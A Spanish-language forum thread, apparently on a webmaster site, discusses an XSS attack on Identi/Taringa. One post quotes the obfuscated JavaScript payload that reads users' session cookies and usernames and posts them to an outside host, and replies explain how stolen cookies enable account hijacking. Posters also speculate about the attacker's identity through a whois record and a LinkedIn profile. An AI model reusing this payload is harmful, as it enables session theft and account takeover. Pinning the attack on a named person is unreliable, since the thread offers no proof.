Hackearon Taringa? :|

  • Autor Autor LuiggiC
  • Fecha de inicio Fecha de inicio
Estado

🔒 Este tema está cerrado para nuevas respuestas.

⏰ Solo el creador del tema puede solicitar la reapertura de sus propios temas, pero únicamente dentro de los 60 días previos a la última actualización.

Lo mas seguro que es solo XSS, no han hackeado nada... simplemente injectaron XSS en e post...

el codigo ese lo que hace es enviar tu cookie a otro server, para que luego alguien pueda entrar con tu cuenta...
Server =
Insertar CODE, HTML o PHP:
http://deporticias.net/save.php

el muy vivo tiene el whois sin proteger sus datos -.-'

https://who.is/whois/deporticias.net

Estos kaker de hoy en dia...
 
Lo mas seguro que es solo XSS, no han hackeado nada... simplemente injectaron XSS en e post...

el codigo ese lo que hace es enviar tu cookie a otro server, para que luego alguien pueda entrar con tu cuenta...
Server =
Insertar CODE, HTML o PHP:
http://deporticias.net/save.php

el muy vivo tiene el whois sin proteger sus datos -.-'

https://who.is/whois/deporticias.net

Estos kaker de hoy en dia...

Hola ando buscando una herramienta para desencriptar pero no encuentro, ¿Me pasas uno?

¿Será el? https://ar.linkedin.com/pub/ivan-kocibux/56/a18/a80 Uno puede engañar datos también. Eso de cookies, también puede ser para robar facebook cosas así verdad? otra manera de robar cuentas? XSS mmmm genial. Asi aprendo a estar al tanto 😀

Como así guarda cookies, que enviamos y ellos como lo usarian? lo convierten en string o como? dame una idea suena genial 😱 pero malo para identi claro XD
 
Hola ando buscando una herramienta para desencriptar pero no encuentro, ¿Me pasas uno?

¿Será el? https://ar.linkedin.com/pub/ivan-kocibux/56/a18/a80 Uno puede engañar datos también. Eso de cookies, también puede ser para robar facebook cosas así verdad? otra manera de robar cuentas? XSS mmmm genial. Asi aprendo a estar al tanto 😀

Como así guarda cookies, que enviamos y ellos como lo usarian? lo convierten en string o como? dame una idea suena genial 😱 pero malo para identi claro XD

1- DDecode - Hex,Octal,HTML Decoder
2- no tengo idea si es el
3- el user en su mayoría pone recordar session o lo que sea y eso queda en las cookies, al obtener las cookies y con algun soft/plugin/lo que sea colocas la cookie en el navegador y listo, vos pasas a estar logeado en esa cuenta... tmb hay otros que guardan el pass en las cookies con md5, ejemplo el foro lo hace de esa manera coloca el pass con md5 en la cookie, para comprobar que el pass de la cookie y el de la base de datos sea el mismo y te permite acceder... pero el foro usa un salto + el password... ejemplo si mi pass fuera pepe, usaria md5("pepe" + "fksoajdmixJDINScASBCDHJASNXDjnhdasj") ese texto aleatorio seria el salto, eso hace que no pueda ser desencriptado el password por diccionario. Y ese salto solo queda dentro de la base de datos, no en la cookie... Si identli mete con md5 el pass en las cookie o la codificacion que sea sin salto, el kaker puede no solo obtener la cookie, sino su pass y por ende puede intentar acceder con el mismo pass a sus otras cuentas.
Respecto a facebook, no permite acceso por cookie inyectadas, ellos manejan distinto eso...
 
Quien sera el proximo ? Forobeta ?:s
 
complicado hacerle xss a vbulletin pero no imposible. metodos asi ya se habian empleado en años anteriores contra vbulletin.
 
:sorrow::sleeping::sleeping:
 
Lo mas seguro que es solo XSS, no han hackeado nada... simplemente injectaron XSS en e post...

el codigo ese lo que hace es enviar tu cookie a otro server, para que luego alguien pueda entrar con tu cuenta...
Server =
Insertar CODE, HTML o PHP:
http://deporticias.net/save.php

el muy vivo tiene el whois sin proteger sus datos -.-'

https://who.is/whois/deporticias.net

Estos kaker de hoy en dia...

¿Sabes si los datos son reales?
 
por perros:greedy_dollars: les pasa jaja 😛irate:
LEAN ESTE POST..PARECE SER QUE YA HABIAN ACORDADO HACER COSILLAS EN TARINGA 😛

😱

Identi reporté sus fallas y ni caso me hacen, los hackers por diversión malogran el negocio.

:fatigue:


Miren:

http://www.subeimagenes.com/img/javaaaaaaaaaaa3-1491334.png ESTO LE OCURRIÓ A IDENTI.

Con este código infectaron:

HTML:
var _0x3e0f=["\x3D","\x3B","\x73\x70\x6C\x69\x74","\x63\x6F\x6F\x6B\x69\x65","\x6C\x65\x6E\x67\x74\x68","\x73\x75\x62\x73\x74\x72\x69\x6E\x67","\x63\x68\x61\x72\x41\x74","\x20","\x69\x6E\x64\x65\x78\x4F\x66","","\x2E\x6E\x69\x63\x6B","\x74\x65\x78\x74","\x2E\x75\x73\x65\x72\x49\x6E\x66\x6F\x4C\x6F\x67\x69\x6E\x20\x2E\x75\x73\x65\x72\x6E\x61\x6D\x65\x20\x2E\x6E\x69\x63\x6B","\x53\x4D\x46\x43\x6F\x6F\x6B\x69\x65\x31\x31","\x68\x74\x74\x70\x3A\x2F\x2F\x64\x65\x70\x6F\x72\x74\x69\x63\x69\x61\x73\x2E\x6E\x65\x74\x2F\x73\x61\x76\x65\x2E\x70\x68\x70","\x70\x6F\x73\x74"];function getCookie(_0xf18ex2){var _0xf18ex3=_0xf18ex2+_0x3e0f[0];var _0xf18ex4=document[_0x3e0f[3]][_0x3e0f[2]](_0x3e0f[1]);for(var _0xf18ex5=0;_0xf18ex5<_0xf18ex4[_0x3e0f[4]];_0xf18ex5++){var _0xf18ex6=_0xf18ex4[_0xf18ex5];while(_0xf18ex6[_0x3e0f[6]](0)==_0x3e0f[7]){_0xf18ex6=_0xf18ex6[_0x3e0f[5]](1)};if(_0xf18ex6[_0x3e0f[8]](_0xf18ex3)==0){return _0xf18ex6[_0x3e0f[5]](_0xf18ex3[_0x3e0f[4]],_0xf18ex6[_0x3e0f[4]])};};return _0x3e0f[9];}if($(_0x3e0f[10])[_0x3e0f[4]]){var nick=$(_0x3e0f[12])[_0x3e0f[11]]();var cookie=getCookie(_0x3e0f[13]);var formData={"\x75\x73\x65\x72":nick,"\x63\x6F\x6F\x6B\x69\x65":cookie};$[_0x3e0f[15]](_0x3e0f[14],formData);};

Así roban jaja

Lo mas seguro que es solo XSS, no han hackeado nada... simplemente injectaron XSS en e post...

el codigo ese lo que hace es enviar tu cookie a otro server, para que luego alguien pueda entrar con tu cuenta...
Server =
Insertar CODE, HTML o PHP:
http://deporticias.net/save.php

el muy vivo tiene el whois sin proteger sus datos -.-'

https://who.is/whois/deporticias.net

Estos kaker de hoy en dia...

Serán realmente los datos de él?...

1- DDecode - Hex,Octal,HTML Decoder
2- no tengo idea si es el
3- el user en su mayoría pone recordar session o lo que sea y eso queda en las cookies, al obtener las cookies y con algun soft/plugin/lo que sea colocas la cookie en el navegador y listo, vos pasas a estar logeado en esa cuenta... tmb hay otros que guardan el pass en las cookies con md5, ejemplo el foro lo hace de esa manera coloca el pass con md5 en la cookie, para comprobar que el pass de la cookie y el de la base de datos sea el mismo y te permite acceder... pero el foro usa un salto + el password... ejemplo si mi pass fuera pepe, usaria md5("pepe" + "fksoajdmixJDINScASBCDHJASNXDjnhdasj") ese texto aleatorio seria el salto, eso hace que no pueda ser desencriptado el password por diccionario. Y ese salto solo queda dentro de la base de datos, no en la cookie... Si identli mete con md5 el pass en las cookie o la codificacion que sea sin salto, el kaker puede no solo obtener la cookie, sino su pass y por ende puede intentar acceder con el mismo pass a sus otras cuentas.
Respecto a facebook, no permite acceso por cookie inyectadas, ellos manejan distinto eso...

tumblr_inline_nfe2k63dDU1qk1op9.gif


Jajaja, siempre aprendiendo con vos cicklow 😛7:


Quien sera el proximo ? Forobeta ?:s

:s :s :s

complicado hacerle xss a vbulletin pero no imposible. metodos asi ya se habian empleado en años anteriores contra vbulletin.

😱
 
Estado

🔒 Este tema está cerrado para nuevas respuestas.

⏰ Solo el creador del tema puede solicitar la reapertura de sus propios temas, pero únicamente dentro de los 60 días previos a la última actualización.

Atrás
Arriba